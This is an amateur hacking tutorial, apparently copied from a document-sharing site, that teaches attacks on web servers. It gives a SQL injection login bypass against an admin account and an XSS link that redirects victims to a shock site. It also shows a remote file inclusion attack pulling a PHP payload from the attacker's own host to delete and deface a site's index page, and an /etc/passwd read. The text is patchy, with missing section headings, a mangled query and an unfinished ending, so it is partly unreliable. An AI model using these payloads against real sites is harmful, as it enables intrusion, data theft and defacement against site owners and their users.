Escolar Documentos
Profissional Documentos
Cultura Documentos
Hello and welcome to this tutorial. If you see all the text on this page, and are afraid, you're not meant to be a hacker, quit now. Also, please know now that unlike in the movies, not everything is hackable. I will be writing about the basics of hacking servers; I will cover how to scan and/or exploit vulnerable daemons (services) running on the target server, and how to discover and/or exploit web-script vulnerabilities. You will need to know your way around a computer before reading this. And if you don't know what a word means, Google or Wiki it!; if you don't understand a concept, post here and I will try to clarify. Thanks for reading, hope this helps.
Recommended Tools
Port Scanner - nmap - http://nmap.org/ Browser - FireFox - http://firefox.com/
Daemon Vulnerabilities
Description
Daemons (also commonly known as services) are the processes that run on a computer that allow it to do things such as serve pages with the HTTP protocol, etc. (although they do not always necessarily interact over a network). Sometimes these daemons are poorly coded, which allows for an attacker to send some sort of input to them, and they either crash, or in worse cases, they run any code the attacker chooses.
vulnerability, which when run on the target server will make it crash.
SQL Injection
Description SQL injection is the act of injection your own, custom-crafted SQL commands into a web-script so that you can manipulate the database any way you want. Some example usages of SQL injection: Bypass login verification, add new admin account, lift passwords, lift credit-card details, etc.; you can access anything that's in the database. Example Vulnerable Code - login.php (PHP/MySQL) Here's an example of a vulnerable login code PHP Code:
<?php $user = $_POST['u']; $pass = $_POST['p']; if (!isset($user) || !isset($pass)) { echo("<form method=post><input type=text name=u value=Username><br /><inp ut type=password name=p value=Password><br /><input type=submit value=Login>< /form>"); } else { $sql = "SELECT `IP` FROM `users` WHERE `username`='$user' AND `password`= '$pass'"; $ret = mysql_query($sql); $ret = mysql_fetch_array($ret); if ($ret[0] != "") { echo("Welcome, $user."); } else { echo("Incorrect login details."); } } ?>
Basically what this code does, is take the username and password input, and takes the users's IP from the database in order to check the validity of the username/password combo.
Testing Inputs For Vulnerability Just throw an "'" into the inputs, and see if it outputs an error; if so, it's probably injectable. If it doesn't display anything, it might be injectable, and if it is, you will be dealing with blind SQL injection which anyone can tell you is no fun. Else, it's not injectable. The Example Exploit Let's say we know the admin's username is Administrator and we want into his account. Since the code doesn't filter our input, we can insert anything we want into the statement, and just let ourselves in. To do this, we would simply put "Administrator" in the username box, and "' OR 1=1--" into the password box; the resulting SQL query to be run against the database would be "SELECT `IP` FROM `users` WHERE `username`='Administrator' AND `password='' OR 1=1-'". Because of the "OR 1=1", it will have the ability to ignore the password requirement, because as we all know, the logic of "OR" only requires one question to result in true for it to succeed, and since 1 always equals 1, it works; the "--" is the 'comment out' character for SQL which means it ignores everything after it, otherwise the last "'" would ruin the syntax, and just cause the query to fail.
Testing Inputs For Vulnerability For this, we test by throwing some HTML into the search engine, such as "<font color=red>XSS</font>". If the site is vulnerable to XSS, you will see something like this: XSS, else, it's not vulnerable. Example Exploit Code (Redirect) Because we're mean, we want to redirect the victim to goatse (don't look that up if you don't know what it is) by tricking them into clicking on a link pointed to "search.php?search=<script>window.location='http://goatse.cz/'</script>". This will output "You searched for <script>window.location='http://goatse.cz/'</script>. There were no results found" (HTML) and assuming the target's browser supports JS (JavaScript) which all modern browsers do unless the setting is turned off, it will redirect them to goatse.
Description This vulnerability allows the user to include a remote or local file, and have it parsed and executed on the local server. Example Vulnerable Code - index.php (PHP) PHP Code:
<?php $page = $_GET['p']; if (isset($page)) { include($page); } else { include("home.php"); } ?>
Testing Inputs For Vulnerability Try visiting "index.php?p=http://www.google.com/"; if you see Google, it is vulnerable to RFI and consequently LFI. If you don't it's not vulnerable to RFI, but still may be vulnerable to LFI. Assuming the server is running *nix, try viewing "index.php?p=/etc/passwd"; if you see the passwd file, it's vulnerable to LFI; else, it's not vulnerable to RFI or LFI. Example Exploit Let's say the target is vulnerable to RFI and we upload the following PHP code to our server PHP Code:
<?php unlink("index.php"); system("echo Hacked > index.php"); ?>
and then we view "index.php?p=http://our.site.com/malicious.php" then our malicious code will be run on their server, and by doing so, their site will simply say 'Hacked' now.
Conclusion
Tutorial inspired by: the avoidance of homework. Now that you read all that,